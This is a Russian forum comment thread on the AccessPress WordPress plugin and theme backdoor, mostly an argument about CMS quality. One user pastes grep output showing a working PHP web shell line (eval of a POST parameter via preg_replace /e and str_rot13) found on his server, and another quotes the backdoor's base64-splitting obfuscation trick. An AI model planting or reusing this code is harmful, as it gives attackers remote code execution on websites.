Злоумышленникам удалось встроить бэкдор в 40 плагинов и 53 темы оформления для системы управления контентом WordPress, разрабатываемых компанией AccessPress, которая заявляет, что её дополнения используются на более чем 360 тысячах сайтов. Результаты разбора инцидента пока не приводятся, но предполагается, что вредоносный код удалось внедрить в ходе компрометации сайта AccessPress, внеся изменения предлагаемые для загрузки архивы с уже выпущенными релизами, так как бэкдор присутствует только в коде, распространяемом через официальный сайт AccessPress, но отсутствует в тех же выпусках дополнений, распространяемых через каталог WordPress.org...Подробнее: https://www.opennet.ru/opennews/art.shtml?num=56560
храните ваши деньги в сберегательной кассе ©
Пишите сайты на Wt.
Тогда на асме сразу, чего мелочиться. https://asm32.info/fossil/asmbb/index
флат только для 86х . т.е ненужен
https://www.webtoolkit.eu/wt/download
тормознутое c++ сами жрите
x86_64 тоже не нужен
С поддерживает ассемблерные вставки. Если для проекта формализируете, как работать с регистрами и прочим, почему бы и нет.
и куда ты их вставлять собрался ? вот конкретно, хттп сервер отдающей файл в линуксе с неизвестной фс на неизвестную карту на неизвестной платформе. расскажи мне и я повставляю
Тебе topin89 предложил это. Ты у него спроси конкретно. А когда он тебе расскажет, ты сможешь вставить их на сайт, который ты пишешь.Да, ты не в теме - Wt к HPH отношения не имеет. Ты должен изучить тему прежде, чем ты будешь выражать мнение.
Крупная компания, которая держит гомогенный парк серверов и начинки в них. Ты доволен? Сначала написать на Си, потом раздебажить, оптимизировать вручную. А затем и переписать с нуля на ассемблере. Типа нереально?
Типа нереально. При попытке сделать так возникает куча проблем организационного и экономического толка. Например, привязка к этой гомогенности. Пройдёт лет пять, и железо потребуется обновлять или расширять, но в случае заточенного под конкретную железку кода, вариант со сменой железа станет гораздо дороже. То есть, сильно затачиваясь на что-то, мы приносим в жертву будущую гибкость принятия решений. Стоит ли оно того?А тут мы подходим к проблеме бюрократии и разделения ответственности за принятие решений. Это в принципе большая и сложная организационная проблема: часто при принятии решения основные риски берёт на себя не тот, кто квалифицирован в достаточной мере, чтобы принимать такое решение. Например, рискующим больше всех может быть инвестор. А достаточно квалифицированным может быть менеджер среднего звена. И как? На этого менагера невозможно свалить финансовые риски, связанные с решением. А попытка вынудить инвестора принять риски будет связана с тем, что инвестор должен будет _поверить_ специалистам, что риск стоит того. А если решение окажется неудачным? Доверию придёт конец. CEO уволят, а может не только его. Кому это надо?
Или другая проблема: кто будет оптимизировать так код? Крутой спец, этт понятно, но каким будет его положение в организации? Рядовой девелопер? Чем он будет заниматься после окончания деятельности по созданию такой оптимизированной реализации? Если мы не найдём ему полезной (aka приносящей денег) деятельности, то он будет висеть на организации мёртвым грузом: зарплату получает, денег не приносит. Если же мы его уволим, то что будем делать в случае проблем с его кодом?
В каких-то специальных случаях может быть выгодно так оптимизировать. В криптомайнинге, например. Но во многих-многих других проще (и дешевле, и надёжнее) купить больше железа.
> Типа нереально?
Хорошей эвристикой реальности или нереальности какого-то замысла являются примеры успешной реализации этого замысла. Настолько хорошей, что когда какой-то замысел кажется удачным, но ты не видишь примеров его реализации, то дефолтным выводом твоим должен быть вывод о нереальности замысла. Дефолтным -- это в том смысле, что другой вывод возможен только после того, как ты нашёл объяснение наблюдаемому отсутствию реализаций замысла.
Два чая этому господину!
ВордТрест?
Вообще-то Витти.
Вивитти (надо выйти / на репите) тогда уж.
храните ваши деньги в нашей сберегательной кассе
Сайты нужно писать на Расте.
Тогда никакой памяти не хватит из-за безопасной утечки.
С одной строны бекдор в темах это странно.
С другой - вид и поведение связаны и если в тему можно сунуть бекдор - система гибкая.
В третьих - это же веб...
и что что веб? или по вашей методичке веб - это криво? напомню, что вы как раз на вебе выср;%и каммент и когда хеловордите то пользуетесь вебом чтобы найти очередной свой хеловорд.
есть большое количество систем управления которые не страдают таким маразмом как вп но миллиарды мух не могут же ж ошЫбатся...п.с. кстати интырпрайз еще сильно дырявее чем веб т.к. там в 90% случаев все "секурити" оставляют на растерзание нетворадминам, которые плавно превращаются в девопсов, тестеров и исправлятелей
Так может например какой-нибудь Гугл сделает правильную CMS для всех. Ой так им же это не выгодно им выгодно поддерживать УГ, вместо которых давать свои проприетарные ресурсы как сервис. Которые конкретно Гугл еще и закрывает постоянно.
Правильная CMS наверняка уже существует. Просто не все ещё её для себя нашли. Но попытаться стОит.
Начните вот с этого списка, для начала: https://en.wikipedia.org/wiki/List_of_content_management_sys...
Уже есть самая правильная CMS на свете -- Битрикс.
Таблетки пить не забывайте пожалуйста.
Ну, в общем да. Имманентно присущее свойство. Слишком много уровней абстракции, слишком широко распространение слишком... Да всё слишком.
Криво, косо, уродливо, частичнополомано ну вот просто ВСЕГДА.
Да, веб и криво это синонимы, где-то с середины 2000х (а то и раньше). Профэссор, я работаю без методичек.
> напомню, что вы как раз на вебе выср;%и каммент и когда хеловордите то пользуетесь вебом чтобы найти очередной свой хеловорд.И что это меняет?
> кстати интырпрайз еще сильно дырявее чем веб т.к. там в 90% случаев все "секурити" оставляют на растерзание нетворадминам, которые плавно превращаются в девопсов, тестеров и исправлятелейФактически интырпрайз и есть веб, где-то больше, где-то меньше.
То что система гибкая это не её плюс. То что в вордпрессе плагины и даже их версии часто прибиты гвоздями к версии не плюс. И то что темы и версии плагинов никто конечно же не обновляет после того как сдали например заказчик это факт.Вывод: Вордпресс — УГ.
> Вывод: Вордпресс — УГ.Критикуешь неправильное -- рекомендуй правильное.
Поэтому список CMS давай, которые труъ.
Ждём.
Таких нет. Вся вэбня это шлак и помои. Без исключений.
Любой генератор статики к твоим услугам. Например https://gohugo.io/
wp можно переводить в статику - итого имеет доступ к богатой экосистеме плагинов и тем без необходимости клепать велосипеды на очередном генераторе статикиcurl -I http://megalanding.wordpress.site/ > index.html
Вот и имеем 360 000 затрояненных сайтов. Зато богатая экосистема плагинов, а не помойка. Вы обязательно продолжайте ваше мнение очень важно для нас.
Дурачкам вроде тебя не приходила мысль, что из всех существующих CMS вообще НИ ОДНА может не быть хорошей?!
Какое решение на замену CMS вы бы назвали хорошим?
Некоторые считают, что альтернатива -- утки! :)PS: жертв wordpress, конечно, жаль каждый раз, но и предупреждали их тысячекратно; а здесь слово "access" содержится прям в названии лавочки, столь удобно его предоставившей.
Можно просто взять и отверстать сайт?
Работы буквально столько же если не меньше чем с вордпрессом.Если нужна динамика то бекенд прикручиваешь хоть на томже жаваскрипте.
И есть же всякие, прости господи, реакты, для тех кто неосилил штмл.
Сейчас верстая по современному вы стянете половину npm. А там такая же дырень как и вордпрес.
> Какое решение на замену CMS вы бы назвали хорошим?Любое самописное. Звучит смешно, но именно свой проф.движок может 100% отвечать вашим запросам - безопасность, простота, скорость, дизайн, *правильный ЯП* и т.п. И конечно же, быть СОПРОВОЖДАЕМЫМ - ключевое свойство долгосрочных проектов.
Звучит не смешно а печально. Опеннет скатился...Один всерьез думает что реакт это "замена html", другой каждый день пишет "свой проф.движок", вероятно, на деньги из тумбочки...
Сколько гуглей уже написал-то?
Сколько троянов в своём вордпрессе уже нашел? Ой так ты их и не искал, ты троянов специально разводишь как тараканов.
Битрикс разумеется !
> Битрикс разумеется !Пойдите на nic.ru, там есть бесплатный месячный пробный тариф с битриксом (ссылка доступна через FAQ про тарифы CMS-хостингов, тогда как в числе тарфов битрикса пробный почему-то отсутствует).
Зарегистрируйтесь, купите бесплатный тариф (он у них требует оплату в 1р вроде бы), установите на хостинг CMS (для этого там есть кнопка "установить CMS"), затем зайдите туда по ftp и ознакомьтесь со скриптами.Маленькие base64 в сабже вам покажутся детским лепетом по сравнению с обфусцированным php-кодом 1C.
Также не думаю, что вы сможете как-то оценить безопасность подобной абракадабры.
Любезный, у меня самого сайт на Битрикс уже как 10 лет, если не больше.В Битрикс есть встроенный модуль "Проактивная защита" - если в нём выставить всё на максимум то от кулхацкеров-школьников он гарантировано защитит.
P.S.
Я объективен - ибо сам этим модулем не пользуюсь - так как обладаю знаниями и умениями как самому всё обезопасить. Кроме того этот модуль привносит некоторую тормознутость, но для новичков - он самое оно !
> Любезный, у меня самого сайт на Битрикс уже как 10 лет, если не больше.Нет у вас сайта на битриксе.
Вы вбили в яндекс запрос "битрикс защита", прочитали два первых пункта выдачи и написали с них коммент.
Это явное палево.
Даже по нику моему ткнуть лень было :) ?Или поиском по комментариям моим что здесь на опеннете, что на лоре, что на сёрче пробежаться (ник у меня везде одинаковый) ?
Я не шифруюсь ни разу !
Детский сад право - зачем мне в такой мелочи что-то придумывать ?
Проактивная защита, Проактивная, Карл! После таких комментариев вера в пыхеров полностью исчезает. Зачем вообще она нужна в чем-то безопасном.Это я уже не говорю что заявления: «Я удалил антивирус, поэтому у меня нет вирусов» это пять я считаю. Продолжайте в том же духе.
1.Не я так модуль назвал так что не по адресу :)
2.
Я не использую этот модуль так как использую modsecurity и антивирус мне не нужен так как сайт на выделенном сервере (не vps), других юзеров на сервере кроме меня нет, пользовательского контента нет, никто ничего загрузить не может.
Так что уважаемый Карл поумерьте свой пыл :)
Это тот кусок протухшего кода, который создает php файлик при создании пользователем страницы, да и вообще весь движок должен лежать кишками наружу, с сотнями тысяч точек входа и все это доступно на запись, где большая часть кода не документирована, где нет консольных инструментов для проверки целостности и переустановки, где все спроектировано так, чтобы конечное приложение нельзя было автоматически разворачивать и тестировать?
Вы просто не умеете его готовить :)Разумеется для сайта визитки Битрикс избыточен, разумеется для крупного кластерного решения Битрикс тоже не подходит, но для "среднего" звена по соотношению цена/качество Битрикс очень даже неплох (несмотря на огромное количество недостатков).
> Вы просто не умеете его готовить :)Не умею и людей умеющих в природе не встречал, хотя многие до сих пор пытаются, у некоторых даже получается сделать так чтобы от первого взгляда не тянуло блевать от кода.
> Разумеется для сайта визитки Битрикс избыточен, разумеется для крупного кластерного решения
> Битрикс тоже не подходит, но для "среднего" звена по соотношению цена/качество
> Битрикс очень даже неплох (несмотря на огромное количество недостатков).Видел не мало крупных проектов на этом продукте, даже без кластера, на одном толстом сервере, это превращается в неподдерживаемое нечто. Из плюсов там разве что готовые интеграции, которые чаще всего не работают из коробки, и готовые решения, которые тоже чаще не работают как надо.
> которые чаще всего не работают из коробкиТо что нужна после сборки обработка напильником это наша общенациональная фича а не недостаток Битрикса :)
Выпускать сырые продукты - это наша общенациональная бага, а не фитча, текущий битрикс, без полной документации апи - еще один пример сырого продукта, где кроме маркетологов никто не работает.
А вот сейчас соглашусь с Вами.Я вот в их модуле "Блоги" нашёл баг который вообще не позволяет модулем пользоваться - 4 раз уже в ТП обращался - баг подтверждают, но уже ГОД не чинят - пишут что неприоритетная задача :(
> Критикуешь неправильное -- рекомендуй правильное.Дурачок, а при создании тикета на баг тоже надо сразу предлагать решение?
Ну да. Пихают нанятые "веб-разработчики", научившиеся в шарашках "фулл-стек за три месяца! только сегодня скидка 60% на весь курс!" всякий шлак в сайт заказчика - но УГ именно Вордпресс, как же иначе-то.
Почему в той же джанге нет таких проблем, хотя их клепают точно такие же курсовики? Да потому что вордпресс — дерьмo мамонта.
> потому что вордпресс — дерьмo мамонтаТы из гибернации давно вышел? Поинтересуйся, когда вышла свежая версия вордпресса.
Разве не именно для этого и существует вордпресс?
Вордпресс существует для того, чтобы делать на нем сайты, подсказывает Кэп.
Вордпресс существует для того, чтобы дегенераты тоже могли делать сайты. я тебя немного поправил, маняКэп, не благодари.
Иди и ещё понаслаждайся ощущением своей невклепенной элитарности. Тем временем кто-то где-то заливает на хостинг ещё один сайт на Вордпрессе и забавно то, что ты с этим ничего поделать не можешь :-) Более того, когда ты это будешь читать - за это время будет залито еще несколько сайтов на Вордпрессе. И тем, кто это делает, совершенно до болта, что какой-то русскоязычный аноним считает их дегенератом. Более того, они об этом даже не узнают. Прочувствуй это. (И вот когда ты это уже дочитал - количество сайтов на Вордпрессе в Интернете опять прибавилось, однако.)
Не прокатило...
:-(
... более чем 360 тысячах сайтов
Но всего на три месяца :-(А ведь щастье было так возможно...
Конечно же это последние вирусы в плагинах и уязвимости в вордпрессе. Теперь заживём. Ор выше гор.
>закамуфлировано в виде блока данных в кодировке base64Одно время работал в саппорте одного сервиса на котором часто хостили WP, и толковой проверки на вирусню там тогда не было, но часто банили за подозрительную активность. По инструкции мы должны в файлах такого клинта искать файлы с base64 кидать в вирус тотал и говорить у вас вирусня вот проверка. Так что что можно тут закамуфлировать)
> искать файлы с base64 кидать в вирус тоталвирустотал лишний этап.
потроха в base64 или еще какая обфускация - сразу нахер с пляжа.
и в политике хостинга это прописать.ps: даешь вирусный опенсорц !
ты так сразу все торрент трекеры закроешь, почти все антивирусы и все программы с ключами. Всё обфускация.
без лицензии выдаваемой полицией ни одного сайта не создашь. ни одного хостинга кроме полицейского не останется.
И что вы тут видите неправильным?
(Все сказанное или подуманное вами будет использовано против вас. Так что думайте аккуратнее.)
детский сад. внтури своих виртуальных машин делайте что хотите,
любой зоопарк, только платите за потребленные ресурсы и трафик.
> обфускация - сразу нахер с пляжаДай я тебя обниму и расцелую!
И все равно там дыра на дыре. Хостингам с этого плюс на бабки ставить пользователей.
Не фартануло не повезло
ох уже этот дырявый веб, больше джавы несите джаву *слюни
При чём _тут_ java?
Там у товарища биполярное мышление PHP vs JAVA
Лютого косплеит.
Возможно тут не java, а дырявый javascript
Вечно с этим вордпрессом не слава богу.
AccessPress -- это не WordPress.
Специалист из WordPress как раз-то и обнаружил этот бэкдор.
Везде б таких специалистов.
> Специалист из WordPress как раз-то и обнаружил этот бэкдор.Читать умеете?
> Везде б таких специалистов.
Достаточно не прогуливать уроки, в том числе тупя в тель-афон.
И тель-авизор?
> Читать умеете?Во втором абзаце написано.
> > Везде б таких специалистов.
> Достаточно не прогуливать уроки, в том числе тупя в тель-афон.Есть чёткое подозрение, что вы не представляете объёмы кода, с которыми приходится работать людям из контор, поддерживающих CMS подобной популярности.
А у AccessPress'а явный косяк в органах надзора за собственными поделиями.
И это уже не столько способность смотреть в код глазами, сколько социальная инженерия среди собственного офиса: люди должны крепко дружить друг с другом и с начальством, но при этом в случае чего -- друг на друга стучать. Тогда таких косяков будет меньше.
> у AccessPress'а явный косякУ WordPress явный косяк, если он ломается троянами из темы оформления.
Если троян в теме, то при чём тут WordPress?
У вас там с логикой всё в порядке?Могу даже подсказку дать: не надо ставить тему с троянами, и проблемы не будет.
А зачем тебе вордпресс без тем?
> ... системы управления контентом WordPress, разрабатываемых компанией AccessPressВнимательно прочти это предложение.
> ... _для_ системы управления контентом WordPress, разрабатываемых компанией AccessPress ...Внимательно прочти слово "для" в этом предложении.
AccessPress разрабатывает штуки _для_ пользователей WordPress.
А WordPress разрабатывают в Automatic.> Наличие вредоносных изменений было выявлено исследователем из компании JetPack (подразделение компании Automatic, занимающейся разработкой WordPress)
Это предложение тоже прочти внимательно. И Мише скажи, чтобы прочитал.
Мож так понятнее станет.
Ты какой-то странный... Что тебе не понятно в слове WordPress? Почему ты его не хочешь замечать?
Косяк не в WordPress'е найден.
Перечитай новость.
Какая архитектура - такие и косяки. Ты до сих пор не смог прочитать фразу "бэкдор для WordPress"?
Чтобы система была полностью защищённой от бэкдоров, она должна быть полностью защищена от запуска в ней стороннего кода.
Поэтому ни тем, ни плагинов под ней не будет.И кому нужна система без тем и плагинов?
Тут благодатная почва - некоторые на данном ресурсе утверждают что им и смартфон то не нужен нынче, весь их мир прост и заранее предсказуем, браузинг в стиле lynx их устраивает. Таким людям конечно никакие темы не нужны, им вообще мало что нужно.
Для тем не обязально давать использовать тьюринг полный интерпретатор.
> вредоносное содержимое ... закамуфлировано в виде ... base64.
> закамуфлированоПравильный камуфляж -- это незаметный камуфляж.
А base64 посреди читаемого кода -- это как военные в зелёном камуфляже посреди белого снега.
Мне особенно понравилась строка:
$b64 = 'bas' . 'e64' . '_dec' . 'ode'10 камуфляжей из 10. Это как наклейка "НЕ ШПИОН" на мундире.
На эту строку не сработает grep по фразе base64_decode. Это отметает автоматические искалки странностей, основанные на grep'е. А с глазами людей, очевидно, ребята даже не пытались бороться, надеясь, что до использования глаз и мозга не дойдёт.
Так ведь и правильно надеялись до него очень долго не доходило.
Да вроде - сразу и спалили? Долго не доходило до владельцев плагина - но если они и были авторами или во всяком случае сотрудничали - то до них и не должно было. Пока вротпресс их сам не зобанил.
(потому шта делиться надо!)
Сразу в голове пыхеров это через три месяца. А сколько осталось, а сколько не нашли. Пыхеры неисправимы, неудивительно что над ними все ржут.
> надеясь, что до использования глаз и мозга не дойдётИли дойдет, но очень потом
Ржу :))))))))))
Осталось написать $b64 = "это не вирус! проходите мимо".
Просто много пробелов, а код весь справа за скроллом не видать уже.
> "это не вирус! проходите мимо".я и прохожу всегда. человек старался как-никак
а скриншоты без богомерзкой мелкостудии ну вообще никак невозможно сделать ?
Сделай!
Ты пропитой? Это саблайм.
крякнутый ?
Ты походу на чем-то тяжелом. Зачем Саблайм крякать он итак работает. Ты это завязывай.
ты похоже даже не в курсе о чем анонче пишет. посмотри какая у тебя лицензия . или ты только второй день и тебе еще не вылетело окно счастья лол
Всё ясно ты солевик больше не заходи сюда больше. Каким образом это окно тебе помешает сделать скриншот. Да даже просто работать неограниченно время оно никак не мешает никому.
> больше не заходи сюда большену и не буду
Емакс тут осилит мало кто.
На чом на чом оно говорите написано? Я даже не буду спрашивать кем))
Нет, не на расте. Про него соседняя новость.
Я так понимаю, эти бэкдоры ещё и продавались? :D
это зависит от количества свободы
где свободы больше там могли продаваться
вот тебе и любитель убунту(и любитель раста) который захотел поставить тёмную тему и нарвался на ...
С вебом все хорошо!
Те кто не хотят платить за свой штат разарботчиков или хотя бы за аутсорсинг должны страдать и платить за это ... хотя бы репутацией в дальнейшем.Другое дело, что общество настолько хитрое, что в мою бытность этих сайтошлепов развелось просто уйма и сейчас из каждого клозета рупопром трубит тильда и Битрикс360
это свобода. а вы предпочитаете рабство? с лицензированием каждого движения каждого человека. а ваши все программы уже лицензированы?
Свобода - это рабство.
Latex, pandoc и hakyll - наше всё.
BDSM
latex, gimp - наше все. остальное для извращенцев
На моём WP-сайте, была такая дыра:<pre>
wp-content# grep -ir str_rot13 *plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/hello.php:if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
plugins/akismet/akismet.php:#if(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}
</pre>
Это не дыра, а это результат предельно топорного взлома, проводимого либо установкой скриптов из непроверенных источников, либо от хитрых заказчиков с бирж фриланса: заказчик просит починить тему (реже плагин), но с условием показа починенной темы на ваших мощностях, потому что у заказчика дескать нет свободного хостинга.Поэтому вы выполняете банальную починку, заливаете на сайт, демонстрируете работающую тему, и получаете обещанный килорубль.
При этом, если у вас нет ограничения на предельную глубину файлового дерева, к которой имеют доступ php-скрипты, все сайты под вашей учётной записью на этом хостинге окажутся скомпрометированы: среди сотен php-скриптов будут как левые, содержащие некое подобие шелла и/или бд-клиента, так и штатные, дополненные аналогичными бэкдорами (как в данном случае).
А для WP ограничить глубину файлового дерева нельзя, потому как иначе невозможен будет залив картинок и других вложений.
Мораль басни: не используйте левые скрипты из непроверенных источников, включая заказчиков на биржах фриланса.
>[оверквотинг удален]
> тему, и получаете обещанный килорубль.
> При этом, если у вас нет ограничения на предельную глубину файлового дерева,
> к которой имеют доступ php-скрипты, все сайты под вашей учётной записью
> на этом хостинге окажутся скомпрометированы: среди сотен php-скриптов будут как левые,
> содержащие некое подобие шелла и/или бд-клиента, так и штатные, дополненные аналогичными
> бэкдорами (как в данном случае).
> А для WP ограничить глубину файлового дерева нельзя, потому как иначе невозможен
> будет залив картинок и других вложений.
> Мораль басни: не используйте левые скрипты из непроверенных источников, включая заказчиков
> на биржах фриланса.Так дело в том, что это я сам скачал WP и установил на свой хостинг (VDS). Потом, пару раз менял VDS-сервер. Архив с копиями сайтов, был где то на диске локального компа. Как то запустил сканирование на вирусы, и сканер нашёл эти скрипты, указав, что это потенциально опасные штуки. Так я узнал, что на одном из VDS, была дыра. После этого, я проверил свои веб-папки. Нигде не встретил подобного случая.
Чем сканировали? Какой Антивирус разбирает php код?
> Чем сканировали? Какой Антивирус разбирает php код?Точно не помню, но по моему, это был стандартный Windows-10 антивирус. Я запустил сканирование, и антивирус нашёл этот код.
> бэкдор для системы управления контентом WordPressОпять WordPress...
PHP - жив!
> на 360 тысячах сайтовКто-нибудь знает хотя бы 30 тысяч сайтов?
Любой сайт купи окна, или стрижка собак. Всем нужен сайт потому что соцсети это выше их ЧСВ.
Потому что в соцсетях 99% - сопливые подростки, которые прибыль приносят только донатным игроделам.
Классика, не? Сломали supply chain. Вывод только один - нужно популяризировать альтернативные решения, написанные не на PHP, Ruby или JavaScript. И писать самостоятельно с нуля.
> И писать самостоятельно с нуля.Мудрое решение. Современные фрейм(нон)ворки настолько сложны в своём интерфейсе, а в итоге просто неповоротливые, что проще, быстрее, надёжнее, дешевле, гибче самому написать, чем пытаться засунуть коня в сферический вакуум.
А через два года вашу лапшу никто не хочет брать на доработку, классика
Пользователи WP должны постоянно страдать. Ситуация когда сайт на WP работает является труднообъяснимым отклонением от нормы.
То есть это западный кусочек 1с?
> То есть это западный кусочек 1с?Вообще это удивительный продукт, у вордпреса не самый плохой интерфейс, у его расширений бывает очень крутой интерфейс и функционал, но сам код вопрдпреса, при том, что он открытый - это просто ппц, даже хуже битрикса, хотя по кол-ву отвратительного кода битрикс не переплюнуть.
Распиаренный ворд-пресс настолько дыряв, что я даже не удивлен
Никогда не понимал тех, кто в своих проектах прикручивает к шаблонизатору php шаблонизатор, но когда вопрос в установке сторонних шаблонов - тут даже обсуждать нечего, надо было позаботиться об отдельном шаблонизаторе, а не давать каждому шаблоничку полный доступ.